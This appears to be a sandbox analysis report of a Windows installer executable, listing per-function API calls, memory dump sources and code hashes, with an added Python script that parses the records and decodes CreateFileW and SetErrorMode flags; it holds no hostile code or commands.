• API String ID: 143517078-0
• Opcode ID: e3890373df0c81f7f32e421c30ebba9c482c94304c5d5f5f92d456d141b17648
• Instruction ID: 03b4fae5a5745b9908b0e41a5aed76128b778eb5b1245b2dd786e1f4817b0b32
• Opcode Fuzzy Hash: e3890373df0c81f7f32e421c30ebba9c482c94304c5d5f5f92d456d141b17648
• Instruction Fuzzy Hash: 97012130644B08EBE7105FA0EC49B163B61A714701F004033FA59EE2E0CB7599ACCF1D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: 92b125542a93b909144426065fba856daa8477dbf69630a7d6309643aaf921cf
• Instruction ID: f7f8115306584c0f02e3d5fca89c2ecad0d5501f9cbf5066a1672ce2d1309927
• Opcode Fuzzy Hash: 92b125542a93b909144426065fba856daa8477dbf69630a7d6309643aaf921cf
• Instruction Fuzzy Hash: 9A011D34A0024D9FDB10DBA6DC4AFAA7BE9AB00744F458076E915D72A1D7A8D485CB1C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 0042FD23
• SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0042FD35
• _memset.LIBCMT ref: 0042FD4A
• SendMessageW.USER32(00000000,0000104B,00000000,?), ref: 0042FD68
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Item_memset
• String ID:
• API String ID: 105786929-0
• Opcode ID: 901cd1dec661f225d1f724e7e27ba8d42aae90a8f2bc24a258625009515dba08
• Instruction ID: 20c144d96375a6b2159e36d131d06b6733b299d5b1de588e6942118d01a32f13
• Opcode Fuzzy Hash: 901cd1dec661f225d1f724e7e27ba8d42aae90a8f2bc24a258625009515dba08
• Instruction Fuzzy Hash: 9D01DBB1901714BFDB10EFA8EC45F9E3BB9AB04364F204232F614E61D0E7B059448B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043F785
• GetObjectW.GDI32(00000000,0000005C,?), ref: 0043F792
  • Part of subcall function 0043FC89: GetLocaleInfoW.KERNEL32(?,00001004,?,00000014), ref: 0043FCBB
  • Part of subcall function 0043FC89: TranslateCharsetInfo.GDI32(00000000,?,00000002), ref: 0043FCD6
• CreateFontIndirectW.GDI32(?), ref: 0043F7A8
• SendMessageW.USER32(?,00000030,00000000,00000000), ref: 0043F7B6
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: InfoMessageSend$CharsetCreateFontIndirectLocaleObjectTranslate
• String ID:
• API String ID: 2681337867-0
• Opcode ID: b9663d79c59867c1305a4d0b104489302cd92a26486f6049de976b04162c7b0f
• Instruction ID: fee66e2e94e828df20c375268f4f2092bc0ee72af2013b51b0ad76cc78cec9ae
• Opcode Fuzzy Hash: b9663d79c59867c1305a4d0b104489302cd92a26486f6049de976b04162c7b0f
• Instruction Fuzzy Hash: F4F03171640308BFEB10AFA5DC4AFAEB7BEBB18704F100429B605A7191CA70A5448B68
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindow.USER32 ref: 0041E412
• GetDlgItem.USER32 ref: 0041E42F
• SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 0041E447
• SendMessageW.USER32(00000000,00000402,?,00000000), ref: 0041E460
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$ItemWindow
• String ID:
• API String ID: 591194657-0
• Opcode ID: 98dccb3494a0f0593dd563cc377b8509c2e120746dfdea32ab5164981f51bdf0
• Instruction ID: 7b7696ef85170225a5facdb99ff1d9fcb28c25c62f0468cc9c07da5ac8cfdf1e
• Opcode Fuzzy Hash: 98dccb3494a0f0593dd563cc377b8509c2e120746dfdea32ab5164981f51bdf0
• Instruction Fuzzy Hash: 2AF0A7753002287FE6002717EC85DBB7B5DDF41359B014036FB09E6561D6695C454A7D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: MessageMultipleObjectsPeekWait
• String ID:
• API String ID: 3986374578-0
• Opcode ID: 676a96eb342a266fcfc4a7ce849cde8eec9497f8f7576232b13238fabb5e0587
• Instruction ID: 542437937e693448d60f790d74c7852ae23aee9b21908bde08184ad7d3a19a40
• Opcode Fuzzy Hash: 676a96eb342a266fcfc4a7ce849cde8eec9497f8f7576232b13238fabb5e0587
• Instruction Fuzzy Hash: 9EF03AB290060EBFDB10DFE4CC89DAB37ADEB04345F008026FA19DA151E379D9498B28
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
• lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
• lstrcpyW.KERNEL32 ref: 0043F6CD
• lstrcatW.KERNEL32(?,?), ref: 0043F6DD
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcatlstrcpylstrcpynlstrlen
• String ID:
• API String ID: 3428934214-0
• Opcode ID: 17fe073695f75e869942cbf363d5995e6be7469ad328acd972bd53ecb49adafd
• Instruction ID: a0fd47fb42ccfc6d0ec60abcec66be1cc4bcd0456df143a0f6ca570c24c75dbb
• Opcode Fuzzy Hash: 17fe073695f75e869942cbf363d5995e6be7469ad328acd972bd53ecb49adafd
• Instruction Fuzzy Hash: 5FF09032801A25AB8B217FA09C06CEB776CEF0A314B01546BF945D3161E7246A8687ED
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindow.USER32 ref: 0041E470
• GetDlgItem.USER32 ref: 0041E489
• SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 0041E499
• SendMessageW.USER32(00000000,00000402,?,00000000), ref: 0041E4B6
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$ItemWindow
• String ID:
• API String ID: 591194657-0
• Opcode ID: 658b5a24fe667039d47aa5bea26469ae3c1b8fa75b7d9059acd01f7a5e4f9c5a
• Instruction ID: 086c65dd2a8fd86eb96c83d516be3b508d86709e954b7f21f5627c47faf4bd84
• Opcode Fuzzy Hash: 658b5a24fe667039d47aa5bea26469ae3c1b8fa75b7d9059acd01f7a5e4f9c5a
• Instruction Fuzzy Hash: CAF08235240224BBD7101B66EC09EEA7F6EDB45BA1F414036FA0CE65A1CB7958818AAC
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00440A9F
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
• SetErrorMode.KERNEL32(00008001), ref: 00440AD8
• RemoveDirectoryW.KERNEL32(0000000A), ref: 00440AE1
• SetErrorMode.KERNEL32(00000000), ref: 00440AEE
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorH_prolog3Mode$DirectoryH_prolog3_Remove
• String ID:
• API String ID: 359717666-0
• Opcode ID: 1deef27381a6c93ade2629717b38e1d02ab6f37601ba07bd2aac61d635b22692
• Instruction ID: 3d0c8204a6a153228ac0b284ba3dea058747ce1289a2eec28a53cc0a46413047
• Opcode Fuzzy Hash: 1deef27381a6c93ade2629717b38e1d02ab6f37601ba07bd2aac61d635b22692
• Instruction Fuzzy Hash: B4F0E9B1A00304ABEB40BFB08D4A77D3B65AF40305F00816BF919A91E2DF758A559759
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
• SysFreeString.OLEAUT32(?), ref: 004015AB
• SysFreeString.OLEAUT32(?), ref: 004015B6
• SetLastError.KERNEL32(?), ref: 004015D4
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorFreeLastString
• String ID:
• API String ID: 3822639702-0
• Opcode ID: d366ffdce4c3edae2fd1804eae267c2211bc30a5108d234b26a8eb6ae91b3288
• Instruction ID: 9a005d60021f5feac5fdb6272902ef105e2fb40344eb9eba5d1b87e231f33d89
• Opcode Fuzzy Hash: d366ffdce4c3edae2fd1804eae267c2211bc30a5108d234b26a8eb6ae91b3288
• Instruction Fuzzy Hash: E0F0F935400A12EFD7009F19E948940BBB1FF48319715823AE40C97A31C775F9A4CFC4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00008001,00000000,?,00440B46,0000000A), ref: 0043F9AB
• CreateFileW.KERNEL32(00440B46,80000000,00000000,00000000,00000003,00000080,00000000,?,00440B46,0000000A), ref: 0043F9C5
• SetErrorMode.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9D1
• CloseHandle.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9DD
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$CloseCreateFileHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1343785229-0
                                                                                                                                                                          • Opcode ID: 3b850a914fe9f9b39da48f75a18da2051ba3526db85358e7479b2d52dc44fb68
                                                                                                                                                                          • Instruction ID: ed0d5c47bd51f109477fc0e304e87e3cfec28a73d1f9b23fc43539f9b5c9113a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b850a914fe9f9b39da48f75a18da2051ba3526db85358e7479b2d52dc44fb68
                                                                                                                                                                          • Instruction Fuzzy Hash: 07E04FB15406807BD6602B72AC0DF1B3E6EEBCAB21F920A35F219E44E1CA245486D668
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• lstrcmpiW.KERNEL32(?,hide_progress), ref: 0041B946
• lstrcmpiW.KERNEL32(?,hide_splash,?,hide_progress), ref: 0041B959
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrcmpi
• String ID: hide_progress$hide_splash
• API String ID: 1586166983-450596345
• Opcode ID: 61b985570fd18731df1cd59468a8c6fd1507b00a5b15ef9586131a75bb3e179c
• Instruction ID: 661bc82a2d12719fcc1ec0ca29b5a91ad18437f56b7443bb46b4a1dad1c0b522
• Opcode Fuzzy Hash: 61b985570fd18731df1cd59468a8c6fd1507b00a5b15ef9586131a75bb3e179c
• Instruction Fuzzy Hash: 00E0D830358F53E5C71097748CD87DD67016F11348F50426AE02A621D1D7ACC98696DD
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_
• String ID: invalid string position$string too long
• API String ID: 2427045233-4289949731
• Opcode ID: f3849ba1738b1d9c1c1a11addbc053a3da717460b735f54e32d7c49fceaa61d1
• Instruction ID: f2f0c8a3fa999fadd7c805550d79f5c883fdd4f26c532e5801715968544a6183
• Opcode Fuzzy Hash: f3849ba1738b1d9c1c1a11addbc053a3da717460b735f54e32d7c49fceaa61d1
• Instruction Fuzzy Hash: 9FB19EB1E00218AFDB24DF68C881BDDB7B4AF54314F2045AFE495A72D1DBB89AC4CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040DD12
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DD47
  • Part of subcall function 0040E275: WriteFile.KERNEL32(?,00000008,00000000,?,00000000,00000000,?,0040DDAB,00000000,?,?,00000000,00000001,0000FEFF), ref: 0040E297
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: File$CreateH_prolog3_Write
• String ID: ]
• API String ID: 925660288-3462329250
• Opcode ID: 88386ccbe3407b0f9cd390b029bcba5f0f870708a6ff11bacba052a2f1e145e6
• Instruction ID: b9a0e95bb5147aa44aa4453cb5ad653d7f6ac383e32e4ac6088c0f16e4f41e64
• Opcode Fuzzy Hash: 88386ccbe3407b0f9cd390b029bcba5f0f870708a6ff11bacba052a2f1e145e6
• Instruction Fuzzy Hash: B6B18071D00258EEDB14DBA5CC85BDEBBB8EF14304F1484AEE149B7181EB742A85CF64
Uniqueness

Uniqueness Score: -1.00%

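The two CreateFileW records above list their arguments only as raw hex: the read-only open at 0043F9C5, bracketed by SetErrorMode(00008001) and SetErrorMode(00000000) and closed immediately, and the GENERIC_WRITE open at 0040DD47 that is followed by a WriteFile. The script below is an added example, not part of this report or of the sandbox's own tooling. It parses API lines in the exact "API.MODULE(args), ref: ADDR" format printed on this page, decodes the documented Win32 constants for CreateFileW and SetErrorMode, and flags the "silent existence probe" sequence (suppress critical-error dialogs, open with OPEN_EXISTING, restore error mode, close the handle). The sample lines are copied from the two records; the constant tables are the standard Win32 values; the probe heuristic is my own reading of that sequence, not a signature the report itself states.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the API lines of two function records on this page,
# copied as the report prints them (bullets and sub-call prefixes included).
PROBE_RECORD = """\
• SetErrorMode.KERNEL32(00008001,00000000,?,00440B46,0000000A), ref: 0043F9AB
• CreateFileW.KERNEL32(00440B46,80000000,00000000,00000000,00000003,00000080,00000000,?,00440B46,0000000A), ref: 0043F9C5
• SetErrorMode.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9D1
• CloseHandle.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9DD
"""
WRITE_RECORD = """\
• __EH_prolog3_GS.LIBCMT ref: 0040DD12
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DD47
  • Part of subcall function 0040E275: WriteFile.KERNEL32(?,00000008,00000000,?,00000000,00000000,?,0040DDAB,00000000,?,?,00000000,00000001,0000FEFF), ref: 0040E297
"""

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function [0-9A-Fa-f]+:\s*")

# Documented Win32 constants: bit flags as (mask, name); creation dispositions are an enum.
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
         (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x40000000, "FILE_FLAG_OVERLAPPED")]
ERRMODE = [(0x1, "SEM_FAILCRITICALERRORS"), (0x2, "SEM_NOGPFAULTERRORBOX"),
           (0x4, "SEM_NOALIGNMENTFAULTEXCEPT"), (0x8000, "SEM_NOOPENFILEERRORBOX")]


@dataclass
class Call:
    api: str
    module: str
    args: list   # ints, or None where the report prints '?'
    ref: int     # call-site address


def parse_trace(text: str) -> list:
    """Parse the report's 'API.MODULE(args), ref: ADDR' lines; headers and unknown lines are skipped."""
    calls = []
    for raw in text.splitlines():
        line = SUBCALL_RE.sub("", raw.strip().lstrip("• ").strip())
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value, table) -> list:
    """Symbolic names for the bits set in value; leftover bits are reported as hex."""
    if value is None:
        return ["?"]
    names, rest = [], value
    for mask, name in table:
        if (value & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return names or ["0"]


def describe_create_file(call: Call) -> dict:
    """Decode the seven real CreateFileW parameters; the report prints extra stack slots after them."""
    p = (call.args + [None] * 7)[:7]
    disp = "?" if p[4] is None else DISPOSITION.get(p[4], hex(p[4]))
    return {"access": decode_flags(p[1], GENERIC), "share": decode_flags(p[2], SHARE),
            "disposition": disp, "attributes": decode_flags(p[5], ATTRS)}


def is_silent_probe(calls: list) -> bool:
    """Heuristic (my assumption): SetErrorMode with SEM_FAILCRITICALERRORS, then CreateFileW
    with OPEN_EXISTING, then SetErrorMode(0) and CloseHandle, inside one function. The file or
    device is opened only to learn whether it exists, with no error dialog if it does not."""
    state = 0
    for c in calls:
        first = c.args[0] if c.args else None
        if state == 0 and c.api == "SetErrorMode" and first is not None and first & 0x1:
            state = 1
        elif state == 1 and c.api == "CreateFileW" and describe_create_file(c)["disposition"] == "OPEN_EXISTING":
            state = 2
        elif state == 2 and c.api == "SetErrorMode" and first == 0:
            state = 3
        elif state == 3 and c.api == "CloseHandle":
            return True
    return False


def summarize(text: str) -> list:
    """One decoded line per CreateFileW/SetErrorMode call, plus a pattern line when the probe matches."""
    calls, out = parse_trace(text), []
    for c in calls:
        if c.api == "CreateFileW":
            d = describe_create_file(c)
            out.append(f"{c.ref:08X} CreateFileW access={'|'.join(d['access'])} share={'|'.join(d['share'])} "
                       f"disp={d['disposition']} attrs={'|'.join(d['attributes'])}")
        elif c.api == "SetErrorMode":
            out.append(f"{c.ref:08X} SetErrorMode {'|'.join(decode_flags(c.args[0] if c.args else None, ERRMODE))}")
    if is_silent_probe(calls):
        out.append("pattern: silent existence probe (SetErrorMode -> CreateFileW OPEN_EXISTING -> SetErrorMode(0) -> CloseHandle)")
    return out


if __name__ == "__main__":
    for record in (PROBE_RECORD, WRITE_RECORD):
        print("\n".join(summarize(record)), end="\n\n")
```

Run stand-alone it prints the first record as GENERIC_READ / share 0 / OPEN_EXISTING with the probe pattern flagged, and the second as GENERIC_WRITE / FILE_SHARE_READ / CREATE_ALWAYS with no pattern. The parser deliberately decodes only the first seven CreateFileW slots, because the report prints whatever follows on the stack after the real arguments.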
APIs
• __EH_prolog3_GS.LIBCMT ref: 0043A5F7
  • Part of subcall function 0043A8D9: __EH_prolog3_GS.LIBCMT ref: 0043A8E0
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$H_prolog3
• String ID: %20$file://
• API String ID: 3952504126-2765206336
• Opcode ID: 1e61cce4cd5163f6bf5badc2fb668c9a329ffd05dab251ec4727f5b8ad8166fd
• Instruction ID: 77530b1a0ea786f010cde3bedfc995ad4c899f8c34f7510d0c1b3be72dc6b4e1
• Opcode Fuzzy Hash: 1e61cce4cd5163f6bf5badc2fb668c9a329ffd05dab251ec4727f5b8ad8166fd
• Instruction Fuzzy Hash: 23617C71A10218EADB10EB94CC91BEEB3B8BB55308F1040AEF445A7191DB785E49CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041FB9A
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00435F95: __EH_prolog3_GS.LIBCMT ref: 00435F9F
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: HsG$Startup
                                                                                                                                                                          • API String ID: 2608676048-1810023339
                                                                                                                                                                          • Opcode ID: 63d44a97fdc39e9bc521022a19b9c7a99b0b530f33bd61a85936d9ba7cb41176
                                                                                                                                                                          • Instruction ID: ed0ca79c93aab8b746b19ee7c433889b8f240a6747215bc3ba99250dd31ddd9f
                                                                                                                                                                          • Opcode Fuzzy Hash: 63d44a97fdc39e9bc521022a19b9c7a99b0b530f33bd61a85936d9ba7cb41176
                                                                                                                                                                          • Instruction Fuzzy Hash: E3518E31900158EADB24EBA0CC55BEEB778AF11304F1440AFF405B71D1EBB86E49CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00456AC9
